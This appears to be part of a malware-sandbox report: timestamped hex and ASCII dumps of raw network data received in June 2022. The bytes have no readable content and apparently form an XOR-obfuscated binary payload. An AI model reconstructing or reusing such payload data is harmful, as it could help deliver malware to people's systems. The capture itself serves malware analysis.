                                2022-06-26 07:43:17 UTC638INData Raw: 0c e5 64 20 21 de 28 35 64 58 1d 0c e5 64 20 19 64 20 15 64 20 11 e4 f7 99 e8 14 f3 99 e4 d1 61 00 99 33 cf 6f 50 ce 64 1d 06 20 1d c4 fe de 25 25 14 f3 99 17 d1 61 00 99 c4 68 83 23 64 38 0d ad 20 c2 61 08 50 e0 14 f3 99 01 d1 0d a3 25 25 25 61 5f 50 2f 64 38 19 14 f3 99 a6 d1 c6 bc 64 38 05 96 da da da da 61 53 50 2f 14 f3 99 dd d1 0d 7f 25 25 25 64 38 01 64 50 fd 2c 77 0d 70 25 25 25 7f 66 38 05 04 a6 4e 27 0c b6 a5 58 c2 08 50 2f 04 ef 4e 29 dc ac 0c f7 ce c9 62 b4 04 ef 4e 29 dc ac 0c f7 d5 45 ce cf 62 b4 04 ef 4e 29 dc ac 0c f7 ce c9 5e 58 15 25 99 2f 77 68 20 15 0d 41 da da da 7f 34 66 50 fd c4 22 da da da 0c b6 61 4f 99 47 61 55 97 18 61 14 52 14 44 b6 2f 25 25 25 51 55 ea db e5 dc 9e 14 f3 99 de d1 c6 09 7d c4 55 da da da 66 20 19 16 20 2d 5a 37
                                Data Ascii: d !(5dXd d d a3oPd %%ah#d8 aP%%%a_P/d8d8aSP/%%%d8dP,wp%%%f8N'XP/N)bN)EbN)^X%/wh A4fP"aOGaUaRD/%%%QU}Uf -Z7
                                2022-06-26 07:43:17 UTC639INData Raw: 25 ad 20 17 a2 20 11 25 25 25 25 dd ee 25 25 25 a5 d4 25 50 f2 66 20 31 5e 1d 27 58 e0 dd 27 25 25 25 5e 1d 37 a3 e0 dd 37 25 25 25 64 20 31 75 dd ea 02 25 25 a5 58 35 27 97 de 66 20 2d 75 68 20 f9 0d 38 27 25 25 66 58 21 ea 92 20 f9 08 da 5a 25 25 5e 1d 27 4e 3f 64 9c 0d 95 25 25 25 68 d9 24 e5 b1 65 25 de 50 11 94 de 25 25 25 ce c9 c6 08 68 50 b2 ea db 38 35 a5 d6 dc 99 35 a5 d6 29 52 e4 ea 9a 20 f9 16 20 31 a3 27 8e 25 68 41 78 d1 b1 65 25 de 38 11 66 f6 de 38 11 da ae 64 1d 06 20 21 36 83 3a c4 cc dc 25 25 b4 b1 65 25 10 68 65 25 91 68 65 25 91 68 65 25 fb 68 65 25 24 73 6b 73 1c 73 d1 2d e5 50 de d5 55 73 9e a5 58 fb 25 99 de d5 08 cf 9e 0d cc da da da ea 9a 28 f9 0c f7 16 28 31 5a f8 5e d4 d8 a1 3d e4 a4 5a 3f d5 55 cf a5 63 25 99 5f af 20 d6 cf d2
                                Data Ascii: % %%%%%%%%Pf 1^'X'%%%^77%%%d 1u%%X5'f -uh 8'%%fX! Z%%^'N?d%%%h$e%P%%%hP855)R 1'%hAxe%8f8d !6:%%e%he%he%he%he%$skss-PUsX%((1Z^=Z?Uc%_
                                2022-06-26 07:43:17 UTC640INData Raw: da 36 a5 da 08 50 27 b4 05 a5 d6 25 99 29 ba 1a c6 27 b6 1a 76 ba 05 8b 84 e4 25 50 2b d5 dc c6 29 b8 fd 0c e5 76 b6 07 b4 48 1d 76 c6 7b d1 2d e5 99 29 61 45 99 d2 73 9e 0c e5 0c f7 d1 51 5f 29 2f 4e ea ff e8 a1 9c 1c 25 64 20 19 ff 20 19 67 c6 0f 73 9e 0c e5 0c f7 af 33 a5 d4 06 99 e0 a5 d4 08 50 dc 6b af 2b 51 5f 29 2f 4e 33 6b 46 f7 2f dc e7 5c 1f 19 dc 25 25 97 0f a5 d4 08 50 27 d2 ff 9e 36 83 3a 66 c0 38 9e 30 66 11 5e e9 e5 2e 66 fd 8f 25 8f ea 8f 25 68 30 2d 68 20 e5 0e a4 0d f5 d4 da da 66 ed 68 30 e5 66 9e 0d 31 8a da da 36 66 c0 38 e7 31 25 b5 30 66 11 5e e9 e5 2e 66 fd 8f 25 8f 25 8f 25 68 30 2d 68 20 e5 8c dc 0d c5 d4 da da 66 ed 68 30 e5 66 9e 0d 01 d3 da da 36 66 c0 38 e7 2d 25 b5 2e 7b 66 17 66 fd 66 9e 0d 72 d7 da da 66 fb 0e a4 0d 9b 23
                                Data Ascii: 6P'%)'v%P+)vHv{-)aEsQ_)/N%d gs3Pk+Q_)/N3kF/\%%P'6:f80f^.f%%h0-h fh0f16f81%0f^.f%%%h0-h fh0f6f8-%.{fffrf#
                                2022-06-26 07:43:17 UTC642INData Raw: 66 ff 60 b6 99 3f 66 30 2d 66 b7 21 23 da da 66 28 2d 68 b9 ec 25 da da da 66 a6 0d fb b9 da da 66 20 2d dc bd 21 23 da da 36 38 9e 66 e5 30 66 11 2e 66 fd 66 20 2d 75 66 9e 0d d2 86 da da 66 f5 66 9e 0d c7 da da da 34 36 38 9e 66 e5 30 66 11 5e e9 05 2e 7b 66 17 66 fd 66 20 2d 75 8f 29 64 50 05 eb 20 09 25 64 38 0d eb 20 11 25 68 20 05 75 8f dc 94 b1 9c 1c 25 68 20 15 df 35 25 25 25 0d d9 ca da da 66 f5 68 20 15 0d 7f da da da 34 83 36 66 c0 38 9e 68 65 25 30 66 11 2c 66 20 2d 5e e5 21 66 35 64 30 21 c6 27 da 25 66 35 af 37 66 28 2d 5f 2c d6 99 17 66 25 06 20 21 65 66 30 2d 64 67 19 34 38 9e 66 e5 30 66 11 66 20 2d a5 9d c8 25 50 4f 66 20 2d 66 65 2d da 95 31 da 95 2d 66 20 2d 68 6d 13 66 20 2d 68 75 15 66 20 2d 5e e5 17 0d 70 23 da da 66 20 2d eb 65 c8
                                Data Ascii: f`?f0-f!#f(-h%ff -!#68f0f.ff -ufff468f0f^.{fff -u)dP %d8 %h u%h 5%%%fh 46f8he%0f,f -^!f5d0!'%f57f(-_,f% !ef0-dg48f0ff -%POf -fe-1-f -hmf -huf -^p#f -e
                                2022-06-26 07:43:17 UTC643INData Raw: 25 0d ca 1f da da 34 c4 ed e0 25 25 30 0d 0a d6 da da 34 30 0d 7d d6 da da 34 66 20 2d 75 30 68 30 fd 66 20 19 0d 9a d6 da da 34 66 20 fd 0d c7 1f da da 34 c4 76 e0 25 25 30 0d 27 d6 da da 34 30 0d 06 d6 da da 34 66 20 2d 75 30 68 30 f9 66 20 19 0d 23 21 da da 34 66 20 f9 0d 50 1f da da 34 c4 93 e0 25 25 30 0d b0 1f da da 34 30 0d 23 1f da da 34 66 20 19 6d 5e 0d 27 97 29 99 3d c6 55 66 20 2d 75 ea 92 20 15 66 30 19 0d 89 1f da da 34 c4 18 e0 25 25 66 20 2d 75 ea 92 20 15 66 29 60 d1 0b 1c 25 0d 4f 1f da da 34 c4 fe e0 25 25 66 20 2d 75 ea 92 20 15 66 29 60 01 0b 1c 25 0d 35 1f da da 34 c4 e4 e0 25 25 30 0d 95 1f da da 34 66 20 19 6d 5e 0d 27 97 2f 99 00 6d 99 24 6d 99 48 c6 5a 30 0d ab 1f da da 34 66 20 2d 75 ea 92 20 13 66 30 19 0d d4 d4 da da 34 c4 f7
                                Data Ascii: %4%%040}4f -u0h0f 4f 4v%%0'404f -u0h0f #!4f P4%%040#4f m^')=Uf -u f04%%f -u f)`%O4%%f -u f)`%54%%04f m^'/m$mHZ04f -u f04
                                2022-06-26 07:43:17 UTC644INData Raw: 66 20 2d 75 dd c1 0b 1c 25 df dc 25 25 25 0d 00 d0 da da 34 c6 40 66 2b 64 20 01 c6 fa 66 2b af 25 00 da 25 25 25 ea 7e e0 3d 9c 1c 25 4e e6 66 2b 0d 6b f8 25 25 64 2b c6 27 da 2b 66 2b a5 5d 25 99 e4 66 2b af 25 5f 20 d6 50 ac 66 20 2d 75 66 3b 06 30 01 66 20 01 0d b6 19 da da 34 66 2b a5 5d 25 99 3b da 2b c6 37 66 20 2d 75 68 20 d6 df dc 25 25 25 0d e3 19 da da 34 66 2b a5 5d 25 ea 60 ff 1d da da 66 20 2d da ad 1d 23 da da 0e e5 7f 34 34 89 64 35 8d f0 c7 65 25 68 20 f9 df 27 25 25 25 0d 1a c3 da da 9e c4 4c 72 da da c6 c6 3a 83 36 66 c0 38 9e 1c 28 0a 75 28 25 25 25 1c 0a 75 25 1c 28 75 28 25 25 25 25 1c 1c 1c 1c 25 25 25 25 1c 1c 1c 25 45 25 25 25 30 66 11 5c e9 1d 23 da da 2e 7b 66 ff 66 15 0e e5 64 60 21 23 da da 0e e5 64 60 1d 23 da da 60 b6 99 e6
                                Data Ascii: f -u%%%%4@f+d f+%%%%~=%Nf+k%%d+'+f+]%f+%_ Pf -uf;0f 4f+]%;+7f -uh %%%4f+]%`f -#44d5e%h '%%%Lr:6f8(u(%%%u%(u(%%%%%%%%%E%%%0f\#.{ffd`!#d`#`
                                2022-06-26 07:43:17 UTC646INData Raw: 13 8b 66 20 17 8b 64 20 11 c6 5b 8b 66 58 15 af 20 c4 ad 20 0d 8b 66 20 17 8b 64 20 13 8b 66 20 19 8b 64 20 11 c6 3f 8b 66 58 19 af 20 c6 ad 20 0d 8b 66 20 17 8b 64 20 13 8b 66 20 15 8b 64 20 11 5e 58 21 25 a3 33 30 ea 92 a2 0d e2 23 da da 34 66 1d c6 95 a5 58 0d 27 52 8f 0d 46 ca da da ea 92 ed ea 92 e0 09 e5 1c 25 06 ed 66 9c 2c 94 89 25 25 25 74 d2 d4 34 8b 46 e5 89 8b de 1d 8b 5e 18 09 e5 1c 25 25 9b 61 ea 92 a2 16 ed a3 10 8b 5e a2 89 c6 0a 0d 55 ca da da 66 1d a5 58 1b dc 50 37 8b 66 20 19 8b 64 20 11 8b 66 20 17 8b 64 20 13 c6 35 8b 66 20 19 8b 64 20 13 8b 66 20 17 8b 64 20 11 66 ae af e8 6c 0b 1c 25 66 eb 0d 3e 21 da da 66 ae 66 eb 0d 3b d6 da da a5 18 79 c2 1c 25 25 ea a9 8e 25 25 25 66 f0 b9 0b 1c 25 dd d5 cd 65 25 0d f4 c3 da da 60 e5 ea a9 76
                                Data Ascii: f d [fX f d f d ?fX f d f d ^X!%30#4fX'RF%f,%%%t4F^%%a^UfXP7f d f d 5f d f d fl%f>!ff;y%%%%%f%e%`v
                                2022-06-26 07:43:17 UTC647INData Raw: da da 66 9e 0d d4 b9 da da c6 e4 66 9e 66 fb 0d 77 b9 da da 83 36 66 c0 38 e7 29 25 66 e5 2e 7b 32 2c 66 b4 66 17 66 1d 8f 27 68 69 49 29 75 7b 32 0d 29 dd da da 60 e5 a3 e0 af 29 49 c6 27 66 9e 7f 3a 83 36 9e 30 66 11 2c 2e 7b 32 64 28 21 66 1f 66 15 66 38 2d 2e 66 20 35 66 65 21 0e a4 66 fb 0d 46 da da da 5e 16 25 50 e8 66 20 21 66 29 dd 66 ae 0d 58 d7 da da 3a 83 36 34 38 e7 2d 25 b5 30 66 11 0e a4 2c 2c 2c 2c 2c 2c 2e 7b 32 0e e5 30 8d 86 88 65 25 89 da 55 89 64 45 0d a2 92 da da 64 20 21 96 dc 25 25 25 e3 d5 0b 1c 25 9a 05 0b 1c 25 30 8f e6 68 20 19 75 94 b5 9c 1c 25 66 ae 6f 68 1e 69 6d 0d 54 da da da 34 66 30 19 66 eb 0d b3 6e da da 30 8f e6 68 20 15 75 94 e5 9c 1c 25 66 ae 6f 68 1e 5d 6d 0d 7b da da da 34 66 30 15 66 a2 0d 46 6e da da 1e 5e a2 29
                                Data Ascii: fffw6f8)%f.{2,fff'hiI)u{2)`)I'f:60f,.{2d(!fff8-.f 5fe!fF^%Pf !f)fX:648-%0f,,,,,,.{20e%UdEd !%%%%%0h u%fohimT4f0fn0h u%foh]m{4f0fFn^)
                                2022-06-26 07:43:17 UTC648INData Raw: 7b 0d a6 8e da da 5c 98 01 21 da da 25 35 25 25 50 41 8d e0 dc 25 25 68 60 0f d8 da da 75 66 60 f5 21 da da 75 0d 9a d7 da da 60 e5 50 fe 8d e0 dc 25 25 68 60 0f d8 da da 75 7c 8d 0b 1c 25 75 0d c9 d7 da da 66 eb 0d 68 da da da 64 20 19 c6 e4 06 90 f5 21 da da 64 50 19 68 60 0f d8 da da d7 81 0d b7 33 25 25 66 f5 67 68 60 ca 23 da da 94 29 dc 25 25 0d 22 ae da da dd 09 d7 65 25 64 20 21 dd 09 d7 65 25 64 20 1d 66 9e 66 f0 d5 4a 65 25 0d 53 a9 da da a9 e5 99 04 66 1e 29 0d fb b7 da da 64 20 21 66 20 21 0d c6 f7 da da 60 e5 99 37 66 30 21 a5 a1 27 da 53 99 2d dd 0d d7 65 25 64 20 1d 8d 25 dc 25 25 68 60 0f 21 da da 75 7c 5d f5 1c 25 66 65 29 75 7c 8d 0b 1c 25 0d d3 7c da da 75 0d 75 8e da da 68 70 c9 d6 da da 66 de 0d 8a 5c da da 68 60 c9 d6 da da 64 60 c9
                                Data Ascii: {\!%5%%PA%%h`uf`!u`P%%h`u|%ufhd !dPh`3%%fgh`#)%%"e%d !e%d ffJe%Sf)d !f !`7f0!'S-e%d %%%h`!u|]%fe)u|%|uuhpf\h`d`
                                2022-06-26 07:43:17 UTC650INData Raw: da da 66 20 21 64 20 09 eb 20 0d e6 64 50 11 eb 20 15 e6 64 58 19 eb 20 1d 25 68 20 09 75 8f 27 68 30 05 7c 0d aa 1c 25 0d f2 cd da da 66 28 05 d7 dc 7c fd 52 65 25 0d 11 21 da da 66 fd 0e e5 7f 34 34 89 64 35 8d 06 92 65 25 68 20 05 0d e8 64 da da 68 20 21 0d e0 64 da da 9e c4 36 a7 da da c6 0d 66 9e 3a 83 36 66 c0 38 9e 64 f1 64 39 49 66 48 25 c4 56 a7 da da 9e 66 e5 30 66 11 0d 61 da da da 68 28 2d 5e 9c 29 66 30 2d 0d ff da da da 38 e7 29 25 66 e5 66 e8 e1 f3 1c 25 d7 dc 7c 5d 9d 65 25 0d 23 21 da da 0d 20 a7 da da 9e 66 25 18 b7 25 25 e5 5a 51 99 34 18 b3 25 25 e5 5a f0 99 2e 08 e0 25 25 e5 99 30 08 62 25 25 25 99 61 6d 99 6d c6 30 e0 4c da da 1a 5e 0d 27 97 0e 99 12 c6 22 18 bb 25 25 e5 5a ec 99 10 08 6e 25 25 e5 99 4d 6d 99 ee 6d 99 3b c6 0a 08 d8
                                Data Ascii: f !d dP dX %h u'h0|%f(|Re%!f44d5e%h dh !d6f:6f8dd9IfH%Vf0fah(-^)f0-8)%ff%|]e%#! f%%%ZQ4%%Z.%%0b%%%amm0L^'"%%Zn%%Mmm;
                                2022-06-26 07:43:17 UTC651INData Raw: 94 a5 25 25 25 0d 48 ab da da 5c e9 b9 25 25 25 9e 66 e5 7b 32 66 1f 0e f7 60 e5 99 8b a5 61 5d 25 99 85 60 da 50 39 af 25 00 da 25 25 25 ea 7e e0 3d 9c 1c 25 4e 71 d7 dc c6 6d 66 d2 73 c6 dc 73 60 1b a1 37 af 31 55 5c bc da 25 25 25 ea 7e e8 3d 9c 1c 25 97 c4 66 aa 06 f3 5c bc dc 25 25 a5 54 e0 24 5e a4 23 1c 60 a4 50 29 d7 27 c6 ee af 29 5d 00 da 25 25 25 ea 7e e0 3d 9c 1c 25 4e 27 d7 dc 66 e7 3a 83 9e 68 65 25 2e 7b 66 17 66 fd 0e e5 a5 18 79 c2 1c 25 25 99 ea 66 9e 0d 49 ad da da 66 fb 6f 0d 8d da da da 83 36 9e b5 0e a4 a5 18 79 c2 1c 25 25 99 e2 0d 79 da da da 66 ed 66 9c 9e 68 65 25 2e 7b 66 17 66 fd 66 9e 0d ce 60 da da 16 15 a3 e4 66 9e 0d 0d 60 da da 66 15 66 fb 66 9e 0d e0 25 25 25 83 36 9e 66 e5 2e 7b 32 30 66 1f 66 15 0e c8 60 da a3 6b 66 eb
                                Data Ascii: %%%H\%%%f{2f`a]%`P9%%%%~=%Nqmfss`71U\%%%~=%f\%%T$^#`P)')]%%%~=%N'f:he%.{ffy%%fIfo6y%%yffhe%.{fff`f`fff%%%6f.{20ff`kf
                                2022-06-26 07:43:17 UTC652INData Raw: 7c 6d c2 1c 25 0d 99 da da da 75 0d 9b c7 da da 0e 1b c6 04 af 69 12 2b af 81 12 e2 4f fd 97 3f 1e ad 20 da af 20 da 00 da 25 25 25 ea 86 e0 3d 9c 1c 25 23 20 da 23 a6 50 0f 5e eb 27 5e 23 31 58 2f af 69 12 2b 2f 69 12 e2 50 ed 3a 83 36 34 38 9e 7c 71 c2 1c 25 5e 1d fa 52 e2 ea 7e e0 35 9e 1c 25 ea b7 e5 9e 68 65 25 30 66 11 5c e9 89 23 da da 2e 7b 32 a2 e0 6d c2 1c 25 e4 29 25 25 a2 e0 71 c2 1c 25 e4 25 25 25 a2 e0 75 c2 1c 25 dc 25 25 25 0d 48 c7 da da 60 e5 99 e0 7e 6d c2 1c 25 8b 60 e5 99 f6 66 f5 8b 5c 07 da de ea 92 f7 64 f0 71 c2 1c 25 ea 92 e5 9c 0d 2f 7e 75 c2 1c 25 e3 61 9e 65 25 9a 3d 9c 1c 25 94 2d 25 25 25 ce 80 5e 18 f5 e5 1c 25 27 ea 60 88 25 25 25 0d 48 da da da a9 e5 99 ee eb e0 30 c2 1c 25 25 eb e0 79 c2 1c 25 25 c4 9a 25 25 25 30 0d 15
                                Data Ascii: |m%ui+O? %%%=%# #P^'^#1X/i+/iP:648|q%^R~5%he%0f\#.{2m%)%%q%%%%u%%%%H`~m%`f\dq%/~u%ae%=%-%%%^%'`%%%H0%%y%%%%%0
                                2022-06-26 07:43:17 UTC654INData Raw: 25 da 00 59 ce 1c 25 66 e5 30 66 11 5e e9 11 2e 0e e5 64 20 11 0e e5 30 8d 91 a2 65 25 89 da 55 89 64 45 0d 20 78 da da 66 fd 60 b6 99 12 64 38 15 eb 20 19 25 68 30 11 66 9e 0d af 09 da da 66 20 11 64 20 1d eb 20 21 e6 68 20 15 75 8f dc 66 e8 cd aa 1c 25 d7 dc 7c 15 9d 65 25 0d 9d c8 da da 66 f5 c6 39 66 e8 45 f5 1c 25 d7 dc 7c 15 9d 65 25 0d 4b c8 da da 66 f5 64 7f 31 66 e7 0d 8b 97 da da 0e e5 7f 34 34 89 64 35 8d 4e a2 65 25 68 20 11 0d 98 9d da da 9e c4 ee 97 da da c6 15 36 66 c0 38 9e 2e 66 fd 60 b6 50 e0 0d 7d da da da 66 9e 36 9e 2e 7b 2c 96 39 9e 1c 25 66 19 c6 3b 66 de 64 2b 66 2b 66 25 64 de df 2d 25 25 25 66 2b 0d 5f 87 da da 5e 16 25 50 c0 7f 83 36 9e b5 2e 8d 11 a2 65 25 0d 7c c1 da da 66 fd 60 b6 99 35 8d 21 a2 65 25 2e 0d bd c1 da da 7e 61
                                Data Ascii: %Y%f0f^.d 0e%UdE xf`d8 %h0ff d !h uf%|e%f9fE%|e%Kfd1f44d5Ne%h 6f8.f`P}f6.{,9%f;fd+f+f%d-%%%f+_^%P6.e%|f`5!e%.~a
                                2022-06-26 07:43:17 UTC655INData Raw: da da 66 29 49 da 6d 31 66 29 49 5e 9d 31 25 50 6d 66 f9 66 1e 45 0d e4 d8 da da 0d e9 72 da da 16 1e 49 99 59 68 1e 31 0d 92 d6 da da 66 ed 5c d4 da da 25 25 50 e4 66 9e 0d 43 23 da da c6 f4 60 a4 5a f0 66 9c 94 da da 25 25 74 d2 d4 60 f7 50 e2 66 9e 0d de 23 da da 7f 36 9e 66 35 0e a4 64 2d 66 e7 0d e2 8d da da 9e 66 e5 30 66 11 5e e9 19 2e 66 fd 77 0d 2c bd da da 64 20 19 0e e5 30 8d 2f a8 65 25 89 da 55 89 64 45 b4 58 23 0e e5 30 8d 11 f1 65 25 89 da 55 89 64 45 66 9e 0d 3d 9d da da 75 0d ef 72 da da 64 20 1d 0e e5 7f 34 34 89 64 35 8d ce f1 65 25 b6 07 b4 48 23 9e c4 6e 91 da da c6 ce 0e e5 7f 34 34 89 64 35 8d ec a8 65 25 66 20 19 75 0d ca 72 da da 9e c4 50 91 da da c6 ca 66 20 1d 36 66 c0 38 9e 68 65 25 f8 25 25 25 31 9e 1c 25 b1 aa 1c 25 29 9e 1c
                                Data Ascii: f)Im1f)I^1%PmffErIYh1f\%%PfC#`Zf%%t`Pf#6f5d-ff0f^.fw,d 0/e%UdEX#0e%UdEf=urd 44d5e%H#n44d5e%f urPf 6f8he%%%%1%%)
                                2022-06-26 07:43:17 UTC656INData Raw: 65 dd 41 a8 65 25 0d 45 91 da da dd 2d f3 65 25 0d 63 91 da da a5 18 40 0b 1c 25 25 99 ea dd 5d 9c 1c 25 df 0d ac 65 25 0d ef 93 da da 0d e4 c4 da da 0d 2d 0f da da 0d ce d0 da da 0d bb cc da da 0e e5 7f 34 34 89 64 35 8d b6 ac 65 25 9e c4 86 42 da da c6 1d 38 9e 25 25 25 da da da da 27 25 25 25 55 9d 25 25 2e 7b 66 17 66 fd 16 ce 58 33 66 9e 06 eb 0d b4 81 da da de eb 83 36 9e 66 eb 06 9e 0d a6 81 da da de 9e 83 36 9e 66 e5 30 66 11 0e e5 30 8d 14 f7 65 25 89 da 55 89 64 45 da e0 cd c2 1c 25 0e e5 7f 34 34 89 64 35 8d 65 f7 65 25 9e c4 6b 42 da da c6 1d 38 9e 66 e5 5e 08 cd c2 1c 25 dc 9e 30 66 11 0e e5 30 8d 4c f7 65 25 89 da 55 89 64 45 da e0 d1 c2 1c 25 0e e5 7f 34 34 89 64 35 8d 9d f7 65 25 9e c4 33 42 da da c6 1d 38 9e 66 e5 5e 08 d1 c2 1c 25 dc 9e
                                Data Ascii: eAe%E-e%c@%%]%e%-44d5e%B8%%%'%%%U%%.{ffX3f6f6f0f0e%UdE%44d5ee%kB8f^%0f0Le%UdE%44d5e%3B8f^%
                                2022-06-26 07:43:17 UTC658INData Raw: 15 66 9e 36 34 38 e7 35 25 b5 da 00 6d ce 1c 25 66 e5 da 00 69 ce 1c 25 66 e5 da 00 65 ce 1c 25 66 e5 da 00 61 ce 1c 25 66 e5 30 66 11 2c 2e 7b 66 ff 66 15 64 38 21 66 20 2d 5e 9d 21 25 99 f4 7b 66 20 2d 66 65 21 75 0d 18 68 da da 64 20 21 5e 58 21 25 50 de 64 38 21 66 20 21 83 36 34 38 9e b5 30 66 11 2c 8d 5d b4 65 25 0d 37 68 da da 64 20 21 30 df c9 f7 65 25 dd 6d b4 65 25 0d 82 da da da 34 7e d5 c2 1c 25 30 df f9 f7 65 25 dd 81 b4 65 25 0d 6c da da da 34 7e d9 c2 1c 25 30 df f9 f7 65 25 dd 89 b4 65 25 0d 56 da da da 34 7e dd c2 1c 25 30 df 05 f7 65 25 dd 91 b4 65 25 0d 40 da da da 34 7e e1 c2 1c 25 30 df 05 f7 65 25 dd 99 b4 65 25 0d 2a da da da 34 7e e5 c2 1c 25 30 df 05 f7 65 25 dd a1 b4 65 25 0d 14 da da da 34 7e e9 c2 1c 25 30 df 05 f7 65 25 dd a9
                                Data Ascii: f6485%m%fi%fe%fa%f0f,.{ffd8!f -^!%{f -fe!uhd !^X!%Pd8!f !6480f,]e%7hd !0e%me%4~%0e%e%l4~%0e%e%V4~%0e%e%@4~%0e%e%*4~%0e%e%4~%0e%
                                2022-06-26 07:43:17 UTC659INData Raw: 25 d9 5b 65 25 e5 5b 65 25 e9 5b 65 25 ed 5b 65 25 e1 5b 65 25 59 59 65 25 75 59 65 25 b1 59 65 25 f0 20 7b 3c 97 44 3c 93 99 79 54 95 40 1e 3c 4e 99 20 97 97 4a 97 66 e5 e1 01 65 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 e1 01 65 25 31 25 25 25 a1 52 65 25 d9 5b 65 25 e5 5b 65 25 e9 5b 65 25 ed 5b 65 25 e1 5b 65 25 59 59 65 25 75 59 65 25 b1 59 65 25 f0 20 7b 3c 97 44 3c 93 99 2a 9b 40 97 8b 91 4a 52 20 97 97 4a 97 66 e5 45 b8 65 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 45 b8 65 25 31 25 25 25 a1 52 65 25 d9 5b 65 25 e5 5b 65 25 e9 5b 65 25 ed 5b 65 25 e1 5b 65 25 59 59 65 25 75 59 65 25 b1 59 65 25 f2 20 7b 3c 97 44 3c 93 99 24 93 9b 3c 91 44 89 1c 97 42 20 97 97
                                Data Ascii: %[e%[e%[e%[e%[e%YYe%uYe%Ye% {<D<yT@<N Jfe%%%%%%%%%%%%%%%%%%%%%%%%%%%%%e%1%%%Re%[e%[e%[e%[e%[e%YYe%uYe%Ye% {<D<*@JR JfEe%%%%%%%%%%%%%%%%%%%%%%%%%%%%%Ee%1%%%Re%[e%[e%[e%[e%[e%YYe%uYe%Ye% {<D<$<DB
                                2022-06-26 07:43:17 UTC663INData Raw: 25 68 20 21 0d c2 34 da da 9e c4 94 71 da da c6 15 36 34 38 9e 68 65 25 30 66 11 8f 25 2e 66 fd 0e e5 30 8d 37 c8 65 25 89 da 55 89 64 45 68 20 21 0d d3 53 25 25 66 9e 66 30 21 0d e9 63 25 25 0e e5 7f 34 34 89 64 35 8d f4 c8 65 25 68 20 21 0d f2 2e da da 9e c4 48 71 da da c6 15 36 34 38 9e 68 65 25 30 66 11 8f 25 2e 66 fd 0e e5 30 8d 83 c8 65 25 89 da 55 89 64 45 68 20 21 0d 3f 61 25 25 66 9e 66 30 21 0d 2d 1a 25 25 0e e5 7f 34 34 89 64 35 8d 40 c8 65 25 68 20 21 0d f6 48 da da 9e c4 fc 71 da da c6 15 36 34 38 9e 68 65 25 30 66 11 8f 25 2e 66 fd 0e e5 30 8d cf c8 65 25 89 da 55 89 64 45 68 20 21 0d 27 16 25 25 66 9e 66 30 21 0d b5 63 25 25 0e e5 7f 34 34 89 64 35 8d 8c c8 65 25 68 20 21 0d aa 91 da da 9e c4 b0 26 da da c6 15 36 34 38 9e 68 65 25 2e 7b 32
                                Data Ascii: %h !4q648he%0f%.f07e%UdEh !S%%ff0!c%%44d5e%h !.Hq648he%0f%.f0e%UdEh !?a%%ff0!-%%44d5@e%h !Hq648he%0f%.f0e%UdEh !'%%ff0!c%%44d5e%h !&648he%.{2
                                2022-06-26 07:43:17 UTC667INData Raw: da 57 89 64 47 66 20 21 8b 66 25 ea 92 f5 5e 1f 39 ea 62 a6 dc 25 25 da 49 70 3a d8 65 25 8e d8 65 25 eb d8 65 25 ca d8 65 25 27 23 65 25 39 23 65 25 4f 23 65 25 65 23 65 25 81 23 65 25 97 23 65 25 35 da 65 25 fe da 65 25 60 23 65 25 1f 23 65 25 35 da 65 25 fe da 65 25 fe da 65 25 bd 23 65 25 86 23 65 25 9a 23 65 25 ae 23 65 25 0b 23 65 25 a2 20 15 25 25 25 25 a2 20 19 25 25 25 25 c4 8d de 25 25 a5 18 45 9e 1c 25 25 99 e8 8b df 39 25 8b dd dc 25 0d 01 07 da da a2 20 15 25 25 25 25 a2 20 19 25 25 25 25 c4 1a de 25 25 66 20 21 ea 9a 65 2d 74 64 20 15 64 30 19 c4 51 de 25 25 66 20 21 66 65 2d 74 64 20 15 64 30 19 c4 3f de 25 25 66 20 21 b4 65 2d 0d a0 0a da da 64 20 15 64 30 19 c4 29 de 25 25 66 20 21 b8 65 2d 0d 8a 0a da da 64 20 15 64 30 19 c4 13 27 25 25
                                Data Ascii: WdGf !f%^9b%%Ip:e%e%e%e%'#e%9#e%O#e%e#e%#e%#e%5e%e%`#e%#e%5e%e%e%#e%#e%#e%#e%#e% %%%% %%%%%%E%%9%% %%%% %%%%%%f !e-td d0Q%%f !fe-td d0?%%f !e-d d0)%%f !e-d d0'%%
                                2022-06-26 07:43:17 UTC671INData Raw: 1c 25 c8 31 1c 25 c8 31 1c 25 c8 31 1c 25 b3 31 1c 25 c9 31 1c 25 92 31 1c 25 ef 31 1c 25 bc 31 1c 25 0e e5 64 20 1d c4 de dc 25 25 a5 18 45 9e 1c 25 25 99 e8 8b df 29 25 8b dd dc 25 0d 9b f9 da da 0e e5 64 20 1d c4 be 25 25 25 66 20 21 ba 65 2d b4 38 1d 76 c4 f9 25 25 25 66 20 21 b6 65 2d b4 38 1d 76 c4 a0 25 25 25 66 20 21 66 65 2d 64 20 1d c4 92 25 25 25 66 20 21 ea 9a 65 2d 64 20 19 b6 20 19 b4 38 1d 76 c4 7c 25 25 25 66 20 21 ea e3 65 2d 64 20 19 b6 20 19 b4 38 1d 76 c4 66 25 25 25 66 20 21 ea db 65 2d 64 20 19 b6 20 19 b4 38 1d 76 c6 9d 66 20 21 ea 92 65 2d 64 20 19 b6 20 19 b4 38 1d 76 c6 40 66 20 21 66 65 2d 64 20 11 0e e5 64 20 15 ba 48 11 b4 38 1d 76 c6 73 66 20 21 ba 8d 2d b4 38 1d 76 c6 67 0e e5 30 8d ec e8 1c 25 89 da 55 89 64 45 66 20 21 0d
                                Data Ascii: %1%1%1%1%1%1%1%1%d %%E%%)%%d %%%f !e-8v%%%f !e-8v%%%f !fe-d %%%f !e-d 8v|%%%f !e-d 8vf%%%f !e-d 8vf !e-d 8v@f !fe-d d H8vsf !-8vg0%UdEf !
